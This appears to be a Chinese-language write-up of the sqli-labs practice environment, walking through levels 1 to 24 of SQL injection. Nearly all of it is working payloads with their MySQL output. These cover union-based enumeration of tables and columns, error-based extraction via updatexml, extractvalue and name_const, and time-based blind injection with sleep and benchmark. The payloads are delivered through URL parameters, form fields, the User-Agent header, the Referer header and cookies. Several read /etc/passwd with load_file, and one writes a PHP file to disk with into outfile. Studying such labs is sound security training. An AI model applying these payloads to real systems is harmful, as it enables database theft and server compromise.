sqli-lab 题解
sqli-lab:1
--后边必须跟空格,而且空格必须是url编码的,不然在url中是不识别的。eg:--%20 ,#的空格是%23
order by 去发现列数
union select 去显示要的数据,当order by不起作用的时候,当order by 不在末尾的时候。也可以用来判断列。如:
mysql> SELECT * FROM users WHERE id =3 order by 55 or 2;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 3 | Dummy | p@ssword |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> SELECT * FROM users WHERE id =3 union all select 1,2,3 or 2;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 3 | Dummy | p@ssword |
| 1 | 2 | 1 |
+----+----------+----------+
2 rows in set (0.02 sec)
mysql> SELECT * FROM users WHERE id =3 union all select 1,2,3,4 or 2;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
这一节主要就是讲sting类型的报错注入,
SELECT * FROM users WHERE id=‘1‘‘ LIMIT 0,1
1)报错:syntax to use near ‘‘ LIMIT 0,1‘ at line 1猜测可能的sql语句,从字符,数字,字符+数字等 select login_name,login_passwd from users where id=‘input id‘ limit 0,1;
‘1‘‘ LIMIT 0,1 就是因为多了‘导致的报错,尝试1\‘可能就不会有错了,同时还有正确的结果,因为在处理id=‘1 union all‘被处理成了id=‘1‘,这个处理是数据库处理的。
mysql> desc users;
+----------+-------------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+----------+-------------+------+-----+---------+----------------+
| id | int(3) | NO | PRI | NULL | auto_increment |
| username | varchar(20) | NO | | NULL | |
| password | varchar(20) | NO | | NULL | |
+----------+-------------+------+-----+---------+----------------+
3 rows in set (0.10 sec)
mysql> select * from users where id =‘33‘;
Empty set (0.00 sec)
mysql> select * from users where id =‘3 union all ‘;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 3 | Dummy | p@ssword |
+----+----------+----------+
1 row in set, 1 warning (0.00 sec)
union all 为什么还会输出原来的行呢?
mysql> SELECT username FROM users WHERE id=‘1‘ union all select version();
+------------------+
| username |
+------------------+
| Dumb |
| 5.5.38-0+wheezy1 |
+------------------+
注意加limit 1,1限制,只读取第二行,union all的作用就是合并重复的行
sqli-lab:2
说说
‘ LIMIT 0,1
SQL原型:
$sql="SELECT * FROM users WHERE id=‘$id‘ LIMIT 0,1";
字符型注入:?id=1\ 报错:near ‘‘1\‘ LIMIT 0,1‘ at line 1
?id=1‘ 报错:near ‘‘1‘‘ LIMIT 0,1‘ at line 1
数字型注入:
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
?id=1‘ 报错:near ‘‘ LIMIT 0,1‘ at line 1
?id=1\ 报错:near ‘\ LIMIT 0,1‘ at line 1
sqli-lab:3
?id=1‘
near ‘‘1‘‘) LIMIT 0,1‘ at line 1
?id=1\
near ‘‘1\‘) LIMIT 0,1‘ at line 1 ‘1\‘) LIMIT 0,1 可以猜测右边是(‘
可能的sql语句:select name,passwd from users where id = (‘$id‘);
实际sql:
$sql="SELECT * FROM users WHERE id=(‘$id‘) LIMIT 0,1";
sqli-lab:4
?id=1\
near ‘"1\") LIMIT 0,1‘ at line 1 "1\") LIMIT 0,1 看输入右边
?id=1"
near ‘"1"") LIMIT 0,1‘ at line 1
可能的sql语句:select name,passwd from users where id = ("$id");
利用语句:http://192.168.229.138/sqli-labs/Less-4/?id=1") union all select 1,2,3 limit 1,1 --+ 或者使用变成一个不存在的数,如9999") union all select 1, current_user,3
实际语句:
$id = ‘"‘ . $id . ‘"‘;
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
?id=99") union all select 1,2,table_name from information_schema.tables where table_schema=‘security‘ --+ 通过table_schema 数据库名
?id=99") union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security‘ --+ 将列上的组织起来,就免去了limit 0,1;limit 1,2来一个个查询的必要了,这样就得到所有的表名,
?id=99") union all select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘emails‘ --+ 根据表名再得到列名,这样整个系统就清楚了。
database(),information_schema.tables (table_schema),information_schema.columns (table_name)
1---------4都是通过union来发现数据。
sqli-lab:5
?id=1\
near ‘‘1\‘ LIMIT 0,1‘ at line 1 ‘1\‘ LIMIT 0,1
由于没有显示相应的用户名,密码,只是告诉你进来了,可以采用报错注入,
?id=9‘ or 1=updatexml(1,concat(0x5e24,@@datadir,0x5e24),1) --+ 0x5e24必须全,不然就会缺胳膊少腿。
XPATH syntax error: ‘^$/var/lib/mysql/^$‘
?id=1‘ and 1=updatexml(1,concat(0x5e24,(select table_name from information_schema.tables where table_schema=database()),0x5e24),1) --+
会报more than one lines,可用group_concat,eg:
?id=1‘ and 1=updatexml(1,concat(0x5e24,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5e24),1) --+
列查找:
?id=1‘ and 1=updatexml(1,concat(0x5e24,(select group_concat(column_name) from information_schema.columns where table_schema=database()),0x5e24),1) --+
1),利用rand()报错,条件,count(*), floor(rand()*2), group by 四个条件缺一不可,现在来构造
select database();
select concat(0x2f,0x2f,(select database()));用()圈起来表示用其结果
select concat(0x2f,0x2f,(select database()),floor(rand()*2))a from information_schema.tables group by a
select 1 from (xxxx)b;
在测试过程中发现执行几遍有时候成功,有时候失败,如下:
mysql> select count(*), concat( (select version()),floor(rand()*11) )a from information_schema.schemata group by a;
ERROR 1062 (23000): Duplicate entry ‘5.5.38-0+wheezy13‘ for key ‘group_key‘
mysql> select count(*), concat((select version()),floor(rand()*11))a from information_schema.schemata group by a;
+----------+-------------------+
| count(*) | a |
+----------+-------------------+
| 1 | 5.5.38-0+wheezy10 |
2)利用extractvalue
?id=1‘ and 1=extractvalue(1,concat(0x5e24,(select user()))) --+
结果:
XPATH syntax error: ‘^$root@localhost‘
3)name_const
mysql> select * from (select name_const(version(),1),name_const(version(),1) as a)b
-> ;
+------------------+------+
| 5.5.38-0+wheezy1 | a |
+------------------+------+
| 1 | 1 |
+------------------+------+
1 row in set (0.00 sec)
mysql> (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as xx)
-> ;
ERROR 1060 (42S21): Duplicate column name ‘5.5.38-0+wheezy1‘
select 外围加括号
?id=1" and 1=(select * from (select name_const(version(),1), name_const(version(),1))b) --+
Duplicate column name ‘5.5.38-0+wheezy1‘
select(password)from(users);换成*目前还不行
select/**/*/**/from/**/users;
mysql> insert into users(username,password) values(‘admin4 x‘,‘password‘);
Query OK, 1 row affected, 1 warning (0.03 sec)
mysql> select * from users where username=‘admin4‘;
+----+----------------------+----------+
| id | username | password |
+----+----------------------+----------+
| 14 | admin4 | admin4 |
| 15 | admin4 | password |
select * from users where username=‘admin4‘ union all select 1,2,load_file(‘/etc/passwd‘);
通过updatexml,extractvalue,name_const都有字段字符限制,union则没有该限制。
select load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100))
sqli-lab7
导出文件
?id=1‘)) union all select NULL,NULL,0x3c3f70687020706870696e666f28293f3e into outfile ‘/tmp/xx.php‘ --%20 %23
导出文件最后是以mysql权限存在的,所以只有在mysql有权限的地方才能操作。
root@kali:/var/www/sqli-labs/Less-7# ls -l /tmp/xx.php
-rw-rw-rw- 1 mysql mysql 36 Apr 24 23:37 /tmp/xx.php
sqli-lab9
select benchmark(5000,encode(‘hello‘,‘world‘)) ;第一个参数表示执行次数,第二个参数则是执行表达式。
?id=1‘ and benchmark(5000000,ENCODE(‘hello‘,‘world‘)) --%20
?id=1‘ and benchmark(5000000,(select md5(‘5‘))) --%20
select 是执行一个动作,如果需要就得结果就得加上()
?id=1‘ and sleep(5) --%20
?id=1‘ and (select if(1=1,sleep(5),null)) --%20 执行5s多
?id=1‘ and if(1=1,sleep(5),null) --%20 执行5s多
?id=1‘ and (select if(1=0,sleep(5),null)) --%20 不会有延迟
sqli-lab10
?id=1" and if(1=1,sleep(4),null) --%20
?id=1" and (select if(1=1,sleep(4),null)) --%20
or (select if((select database())="security",sleep(2),null));
or (select if(database()="security",sleep(1),null));
or (select if(database() like "securit%",sleep(1),null));
select if((select table_name from information_schema.tables where table_name=‘users‘ limit 0,1) like ‘use%‘ ,sleep(1),null);
总结下:
从刚开始的报错,就基本能看出组装的sql语句格式,然后拼接完整‘ %23 和以前一样的话ok,再到爆出mysql_error,再到只告诉有语法错误,再到什么也不提示。union select (有显示行)---> updatexml,extractvalue,name_const (报错)----->or 1=1 [两次显示不一致]------>select if(1=1,sleep(1),null)(都没有呗,但是有sql注入)
sqli-lab 11
uname=admin&passwd=password‘ union all select 1,(select group_concat(username) from users) --%20 &submit=Submit
sqli-lab 12
uname=admin&passwd=password") union all select 1,(select group_concat(username) from users) --%20 &submit=Submit
sqli-lab 13
uname=admin‘) or 1=updatexml(1,concat(0x5e24,version(),0x5e24),1) --%20&passwd=password‘) --%20 &submit=Submit
uname=admin‘) or (select if(1=1,sleep(1),null)) --%20&passwd=password‘) --%20 &submit=Submit
sqli-lab 14
uname=admin" or (select substr((select version()),1,1))=‘5‘ --%20&passwd=password&submit=Submit
sqli-lab 15
uname=admin‘ and (select if(1=1,sleep(2),null))--%20&passwd=password&submit=Submit
select * from users where username=‘admin‘ or (select if(1=1,sleep(2),null)); 也可以
and or等后跟结果表达式,而不是求算式,select xx,是求,加了括号就变成了结果,
sqli-lab 16
uname=admin&passwd=password") or (select if(1=1,sleep(2),null)) --%20&submit=Submit
sqli-lab 17
uname=admin&passwd=password‘ or 1=updatexml(1,concat(0x5e24,version(),0x5e24),1) --%20&submit=Submit
sqli-lab 18
User-Agent: cc‘ or 1=updatexml(1,concat(0x5e24,version(),0x5e24),1),‘‘,‘‘) -- )
sqli-lab 19:
referer:
‘ or 1=extractvalue(1,concat(0x3c,version(),0x3c)),‘‘)#
‘ or 1=extractvalue(1,concat(0x5e24,version(),0x5e24)),‘‘)#
sqli-lab 20:
Cookie:uname=admin‘ or 1=(select * from (select name_const(version(),1),name_const(version(),1))a group by a) --%20
Cookie: uname=admind‘ union all select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security‘),3 --%20
sqli-lab 21:
Cookie:
uname=YWRtaW4nKSB1bmlvbiBhbGwgc2VsZWN0IDEsbG9hZF9maWxlKCcvZXRjL3Bhc3N3ZCcpLDMgaW50byBvdXRmaWxlICcvdG1wL3h4LmxvZycgIw==
22一样
sqli-lab 23:
id=100‘ union all select 1,2,3 or ‘1‘=‘1
SELECT * FROM users WHERE id=‘100‘ union all select 1,2,3 or ‘1‘=‘1‘ LIMIT 0,1 加黑部分组合起来
sqli-lab 24:
新建admin’ -- 用户
郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。
